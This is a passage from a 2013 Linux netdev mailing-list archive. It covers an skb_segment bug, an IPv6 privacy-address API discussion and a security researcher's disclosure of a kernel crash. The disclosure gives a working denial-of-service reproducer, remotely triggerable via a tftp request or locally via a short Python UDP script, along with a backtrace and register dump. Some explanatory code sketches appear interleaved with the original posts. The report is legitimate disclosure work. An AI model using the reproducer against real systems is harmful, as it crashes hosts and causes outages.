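/* Read the VLAN id once, at ingress, under the config in effect then. */
static uint16_t ingress_vid(const struct bridge_cfg *cfg,
			    const struct frame *f)
{
	return cfg->vlan_enabled ? f->tag : 0;
}

/* Later stages receive the id as an argument and never look it up again,
 * so a config change mid-processing cannot alter the result. */
static uint16_t multicast_stage(uint16_t vid)
{
	return vid;
}
```

If the config flips between ingress and the multicast stage, the frame is
still handled with the vid it was admitted under.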
-vlad
>
>> ih = igmpv3_report_hdr(skb);
>> num = ntohs(ih->ngrec);
>> len = sizeof(*ih);
>
> ...
>
^ permalink raw reply
* Re: Bug in skb_segment: fskb->len != len
From: Herbert Xu @ 2013-10-29 14:41 UTC (permalink / raw)
To: Eric Dumazet; +Cc: Christoph Paasch, netdev
In-Reply-To: <1383009308.5464.2.camel@edumazet-glaptop.roam.corp.google.com>
On Mon, Oct 28, 2013 at 06:15:08PM -0700, Eric Dumazet wrote:
> On Mon, 2013-10-28 at 06:21 -0700, Eric Dumazet wrote:
>
> > But we also need to fix the skb_segment() bug anyway.
>
> Hi Christoph
>
> I cooked a minimal patch, could you please try it ?
>
> I'll refactor skb_segment() to be smarter for the next release
> (linux-3.14).
I think this patch is just papering over a deeper issue.
We should either be building skbs in pages, or using frag_list.
In the latter case each frag_list must be exactly mss bytes,
except for the last one.
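Stated as a check, the frag_list rule above looks roughly like this. It is
a user-space sketch over an array of fragment lengths; the function name is
hypothetical, and treating the last fragment as "non-empty and at most mss
bytes" is my assumption about what "except for the last one" allows.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Returns true when every fragment but the last is exactly mss bytes and
 * the last one is between 1 and mss bytes (assumed meaning, see above). */
static bool frag_list_is_mss_sized(const unsigned int *lens, size_t n,
				   unsigned int mss)
{
	for (size_t i = 0; i < n; i++) {
		bool last = (i + 1 == n);

		if (last) {
			if (lens[i] == 0 || lens[i] > mss)
				return false;
		} else if (lens[i] != mss) {
			return false;
		}
	}
	return true;
}
```

A chain that fails this check is the kind of input that trips the
fskb->len != len test in skb_segment().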
So if we're crashing here it means that we got mixed up on the
receive side, either because the driver was sending us bogus skbs
or we're simply buggy.
So we need to figure out why the receive-side (i.e., GRO) is building
these bogus packets, and not papering over them on the transmit-side.
Cheers,
--
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt
^ permalink raw reply
* Kernel crash - Large UDP packet over IPv6 over UFO-enabled device with TBF qdisc (No corking needed)
From: Saran Neti @ 2013-10-29 14:30 UTC (permalink / raw)
To: netdev@vger.kernel.org; +Cc: dl TSL Vulnerability Research Team
Hi,
Sending a UDP packet of size larger than MTU over IPv6 over a device that has UFO enabled, and that uses the TBF qdisc causes the kernel to crash. Unlike CVE-2013-4387, this does not require a corked socket and can be remotely triggered by a tftp request.
Configuration:
1. Configure a Linux system with UDP UFO enabled (e.g. virtio_net).
# ethtool -k eth0 | grep udp-frag
udp-fragmentation-offload: on
2. Assign an IPv6 address to it.
# ip addr show dev eth0 | grep inet6
inet6 fd00:abcd:abcd:123::2/64 scope global
3. Change qdisc to tbf
# tc qdisc replace dev eth0 root tbf rate 200kbit latency 20ms burst 5kb
Reproduction:
a) Over Network
1. Run tftp daemon (e.g. using tftp-hpa).
# in.tftpd -6 -l -s /srv/tftp
2. From a different machine, issue a tftp command to cause the kernel to crash:
# atftp --option "blksize 5000" -g -r file1 fd00:abcd:abcd:123::2 69
Or b) Locally
Run the following python script on the vulnerable system to crash it:
#!/usr/bin/python
import socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, 0)
sock.sendto(b"A"*5000, ('fd00:abcd:abcd:123::3', 1234, 0, 0))
Versions tested:
Mainline - 3.12-rc7 (HEAD: 959f58544b7f20c92d5eb43d1232c96c15c01bfb)
Stable - 3.11.6
This bug triggers on the default config as shipped with the Arch Linux kernel.
I modified it to turn on kgdb (config file attached).
Platform:
# cat /proc/cpuinfo | grep -E "model|flags"
model : 2
model name : QEMU Virtual CPU version 1.6.1
flags : fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pse36 clflush mmx fxsr sse sse2 syscall nx lm rep_good nopl pni cx16 hypervisor lahf_lm
# cat /proc/modules | grep virtio_net
virtio_net 18821 0 - Live 0xffffffffa0108000
virtio_ring 7846 5 virtio_console,virtio_balloon,virtio_blk,virtio_net,virtio_pci, Live 0xffffffffa001e000
virtio 3954 5 virtio_console,virtio_balloon,virtio_blk,virtio_net,virtio_pci, Live 0xffffffffa001a000
Crash analysis: Using 3.12-rc7 compiled with KGDB.
# (gdb) bt
#0 0xffffffff8129a6bd in memcpy () at arch/x86/lib/memcpy_64.S:69
#1 0xffffffff813e2d2a in skb_copy_from_linear_data_offset (skb=0xffff880036abd500, len=62, to=<optimized out>,
offset=-65536) at include/linux/skbuff.h:2425
#2 skb_segment (skb=skb@entry=0xffff880036abd500, features=features@entry=3221244521) at net/core/skbuff.c:2849
#3 0xffffffff814c3e25 in udp6_ufo_fragment (skb=0xffff880036abd500, features=3221244521) at net/ipv6/udp_offload.c:119
#4 0xffffffff814c3867 in ipv6_gso_segment (skb=0xffff880036abd500, features=3221244521) at net/ipv6/ip6_offload.c:120
#5 0xffffffff813f062d in skb_mac_gso_segment (skb=skb@entry=0xffff880036abd500, features=features@entry=3221244521)
at net/core/dev.c:2333
#6 0xffffffff813f0769 in __skb_gso_segment (skb=skb@entry=0xffff880036abd500, features=3221244521,
tx_path=tx_path@entry=true) at net/core/dev.c:2384
#7 0xffffffff81423eab in skb_gso_segment (features=<optimized out>, skb=0xffff880036abd500)
at include/linux/netdevice.h:2844
#8 tbf_segment (sch=0xffff88003c339800, skb=0xffff880036abd500) at net/sched/sch_tbf.c:130
#9 tbf_enqueue (skb=0xffff880036abd500, sch=0xffff88003c339800) at net/sched/sch_tbf.c:167
#10 0xffffffff813f1121 in __dev_xmit_skb (txq=0xffff88003b261e00, dev=0xffff88003b115000, q=0xffff88003c339800,
skb=0xffff880036abd500) at net/core/dev.c:2728
#11 dev_queue_xmit (skb=skb@entry=0xffff880036abd500) at net/core/dev.c:2828
#12 0xffffffff81491d7e in neigh_hh_output (skb=<optimized out>, hh=<optimized out>) at include/net/neighbour.h:355
#13 dst_neigh_output (dst=<optimized out>, skb=0xffff880036abd500, n=0xffff88003b3d7e00) at include/net/dst.h:411
#14 ip6_finish_output2 (skb=skb@entry=0xffff880036abd500) at net/ipv6/ip6_output.c:113
#15 0xffffffff81495198 in ip6_finish_output (skb=skb@entry=0xffff880036abd500) at net/ipv6/ip6_output.c:131
#16 0xffffffff81495203 in NF_HOOK_COND (cond=<optimized out>, okfn=0xffffffff81495100 <ip6_finish_output>,
out=<optimized out>, in=0x0 <irq_stack_union>, skb=0xffff880036abd500, hook=4, pf=10 '\n')
at include/linux/netfilter.h:184
#17 ip6_output (skb=0xffff880036abd500) at net/ipv6/ip6_output.c:145
#18 0xffffffff814c30c5 in dst_output (skb=0xffff880036abd500) at include/net/dst.h:450
#19 ip6_local_out (skb=skb@entry=0xffff880036abd500) at net/ipv6/output_core.c:121
#20 0xffffffff814939d4 in ip6_push_pending_frames (sk=sk@entry=0xffff88003b294440) at net/ipv6/ip6_output.c:1530
#21 0xffffffff814ac7a8 in udp_v6_push_pending_frames (sk=sk@entry=0xffff88003b294440) at net/ipv6/udp.c:1003
#22 0xffffffff814adb16 in udpv6_sendmsg (iocb=<optimized out>, sk=0xffff88003b294440, msg=<optimized out>, len=5004)
at net/ipv6/udp.c:1257
#23 0xffffffff814713c0 in inet_sendmsg (iocb=0xffff880036bb9d68, sock=<optimized out>, msg=0xffff880036bb9e90, size=5004)
at net/ipv4/af_inet.c:770
#24 0xffffffff813d59a0 in __sock_sendmsg_nosec (size=5004, msg=0xffff880036bb9e90, sock=0xffff880037775900,
iocb=0xffff880036bb9d68) at net/socket.c:631
#25 __sock_sendmsg (size=5004, msg=0xffff880036bb9e90, sock=0xffff880037775900, iocb=0xffff880036bb9d68) at net/socket.c:639
#26 sock_sendmsg (sock=sock@entry=0xffff880037775900, msg=msg@entry=0xffff880036bb9e90, size=size@entry=5004)
at net/socket.c:650
#27 0xffffffff813d7fd1 in SYSC_sendto (addr_len=0, addr=0x0 <irq_stack_union>, flags=<optimized out>, len=5004,
buff=0x6387a4, fd=<optimized out>) at net/socket.c:1796
#28 SyS_sendto (fd=<optimized out>, buff=6522788, len=<optimized out>, flags=0, addr=0, addr_len=0) at net/socket.c:1761
#29 <signal handler called>
# (gdb) display/i $pc
2: x/i $pc
=> 0xffffffff8129a6bd <memcpy+13>: rep movs QWORD PTR es:[rdi],QWORD PTR ds:[rsi]
(gdb) info registers
rax 0xffff88003b251dfa -131940403044870
rbx 0xffffffffffff003e -65474
rcx 0x7 7
rdx 0x6 6
rsi 0x6 6
rdi 0xffff88003b251dfa -131940403044870
rbp 0xffff88003be498e0 0xffff88003be498e0
rsp 0xffff88003be49838 0xffff88003be49838
r8 0xc0 192
r9 0x300 768
r10 0xffff88003e001600 -131940355140096
r11 0xffff88003e001600 -131940355140096
r12 0x8 8
r13 0xffff88003ae5b700 -131940407200000
r14 0x0 0
r15 0xffff88003b7f6600 -131940397128192
rip 0xffffffff8129a6bd 0xffffffff8129a6bd <memcpy+13>
eflags 0x10206 [ PF IF RF ]
cs 0x10 16
ss 0x18 24
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
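For anyone reading the dump above, here is a minimal sketch of how its two value columns relate and what the faulting instruction still had left to do. The helper names are hypothetical. It assumes gdb's second column is the same 64-bit value read as a signed integer, and that `rep movs QWORD` moves `rcx` quadwords from `[rsi]` to `[rdi]`. Since `rdi` still equals `rax` here, it looks as if no quadword had been copied yet when the read from the source address `0x6` faulted.

```python
# Sketch only: helper names are illustrative, values are copied from the dump above.

def to_signed64(value):
    """Interpret an unsigned 64-bit register value as two's complement."""
    return value - (1 << 64) if value & (1 << 63) else value


def rep_movsq_bytes_left(rcx):
    """Bytes still to be moved by 'rep movs QWORD' given the count in rcx."""
    return rcx * 8


regs = {
    "rax": 0xFFFF88003B251DFA,
    "rbx": 0xFFFFFFFFFFFF003E,
    "rcx": 0x7,
    "rsi": 0x6,
    "rdi": 0xFFFF88003B251DFA,
}

for name in ("rax", "rbx"):
    print(name, hex(regs[name]), to_signed64(regs[name]))

print("source pointer:", hex(regs["rsi"]))
print("bytes left in rep movsq:", rep_movsq_bytes_left(regs["rcx"]))
```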
I have not tested this with other possible configurations (e.g. different qdiscs). Code paths other than the one shown in the backtrace might also be affected.
If there is any other information I can help you with, please let me know.
--
Saran Neti,
Security Researcher, TELUS Security Labs
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Hannes Frederic Sowa @ 2013-10-29 14:38 UTC (permalink / raw)
To: Dan Williams
Cc: David Miller, jiri, vyasevich, netdev, kuznet, jmorris, yoshfuji,
kaber, thaller, stephen
In-Reply-To: <1383057078.2236.12.camel@dcbw.foobar.com>
Hi!
On Tue, Oct 29, 2013 at 09:31:18AM -0500, Dan Williams wrote:
> On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> > On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> > > On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> > > > From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> > > > Date: Sun, 27 Oct 2013 17:48:35 +0100
> > > >
> > > > > A temporary address is also bound to a non-privacy public address so
> > > > > its lifetime is determined by that address's lifetime (e.g. if you switch the
> > > > > network and don't receive on-link information for that prefix any
> > > > > more). NetworkManager would have to take care about that, too. It is
> > > > > just a question of what NetworkManager wants to handle itself or lets
> > > > > the kernel handle for it.
> > > >
> > > > How much really needs to be in userspace to implement RFC4941?
> > > >
> > > > I don't like the idea that even for a fully up and properly
> > > > functioning link, if NetworkManager wedges then critical things like
> > > > temporary address (re-)generation, will cease.
> > >
> > > Honestly, I'd be completely happy to leave temporary address handling up
> > > to the kernel and *not* do it in userspace; the kernel already has all
> > > the code. There are two problems with that though, (a) it's tied to
> > > in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> > > these are solvable.
> >
> > Ah, (a) does complicate things, I agree. But the tying is essential
> > currently. So it seems a netlink interface would be needed to tie a new
> > address to an already installed one, if the kernel should still deal
> > with the regeneration?
>
> I think it's simpler than that. New flag set when adding the
> non-private address that says "create and manage privacy addresses for
> this non-private address". The kernel then adds the privacy addresses
> generated off the non-private address/prefixlen, and ties their lifetime
> to the non-private address. If the non-private address is removed, the
> privacy addresses could get removed too.
>
> I don't think we need API to tie addresses to already installed ones,
> because the kernel already has the privacy address generation code, so
> why should userspace generate the privacy address at all? Just leave
> that to the kernel.
Ok.
> > > First off, what's the reasoning behind having IPv6 privacy as a config
> > > option? It's off-by-default and must be explicitly turned on, so is
> > > there any harm in removing the config? Or is it just for
> > > smallest-kernel-ever folks?
> >
> > I don't know about the policy. Does it really matter as distributions
> > normally switch it on? But I would not like to see the option removed
> > entirely; maybe the default could be changed.
> >
> > > Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> > > that for some new static address, that the kernel should create and
> > > manage the temporary privacy addresses associated with its prefix?
> >
> > But this would only be needed if they were managed in user-space, no?
>
> "if they" == what? privacy address or static address? What
With "they" I meant privacy addresses.
> NetworkManager is trying to do is handle RAs in userspace with libndp
> for various flexibility and behavioral reasons, but we'd really like to
> leave all the temporary address stuff up to the kernel.
Can you provide me with details on why the kernel RA implementation is not good
enough? I looked for bug reports and found some, but they were missing details,
incorrect, or outdated.
> So NM would handle RA/RS and when it gets a prefix, it would create the
> IPv6 non-private address and add it to the interface. When adding, it
> would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> would then handle all the privacy address generation, lifetimes, and
> timers. Basically, break some of the privacy code away from the
> in-kernel RA handling so that privacy addresses could be triggered from
> userland too.
>
> Would that be workable?
That sounds like a solid plan to me. I would actually have liked to see NM
use the kernel implementation, but I guess there is no way back any more.
:(
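To make the proposed semantics concrete, here is a toy userspace model of the behaviour discussed above; it is a sketch, not kernel code. `MANAGE_TEMP` stands in for the not-yet-existing "IFA_F_MANAGE_TEMP" flag, and the class names, the random interface-identifier helper, and the 7-day cap on the temporary lifetime are all assumptions made for illustration.

```python
# Toy model of the proposal: a flag on the non-private address asks the
# "kernel" to create a privacy address and tie its lifetime to the parent.
import secrets
from dataclasses import dataclass
from typing import Optional

MANAGE_TEMP = 0x1              # hypothetical flag bit, not a real kernel value
TEMP_VALID_LFT = 7 * 24 * 3600  # assumed cap on the temporary lifetime (seconds)


@dataclass
class Address:
    prefix: str                 # textual /64 prefix, e.g. "2001:db8:1:2"
    iid: str                    # textual interface identifier
    valid_lft: int              # valid lifetime in seconds
    flags: int = 0
    parent: Optional["Address"] = None  # set only on privacy addresses


def random_iid():
    """Return a random 64-bit interface identifier as four hex groups."""
    raw = secrets.token_hex(8)
    return ":".join(raw[i:i + 4] for i in range(0, 16, 4))


class Interface:
    def __init__(self):
        self.addrs = []

    def add_address(self, prefix, iid, valid_lft, flags=0):
        """What userspace (e.g. NM after parsing an RA) would request."""
        public = Address(prefix, iid, valid_lft, flags)
        self.addrs.append(public)
        if flags & MANAGE_TEMP:
            # "Kernel" side: derive a privacy address from the same prefix
            # and never let it outlive the non-private address.
            temp = Address(prefix, random_iid(),
                           min(valid_lft, TEMP_VALID_LFT), parent=public)
            self.addrs.append(temp)
        return public

    def del_address(self, addr):
        """Removing the non-private address also drops its privacy addresses."""
        self.addrs = [a for a in self.addrs
                      if a is not addr and a.parent is not addr]


iface = Interface()
pub = iface.add_address("2001:db8:1:2", "0211:22ff:fe33:4455", 86400, MANAGE_TEMP)
print(len(iface.addrs))
iface.del_address(pub)
print(len(iface.addrs))
```

Regeneration timers are left out on purpose; the model only shows the creation and removal coupling that the flag would request.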
Greetings,
Hannes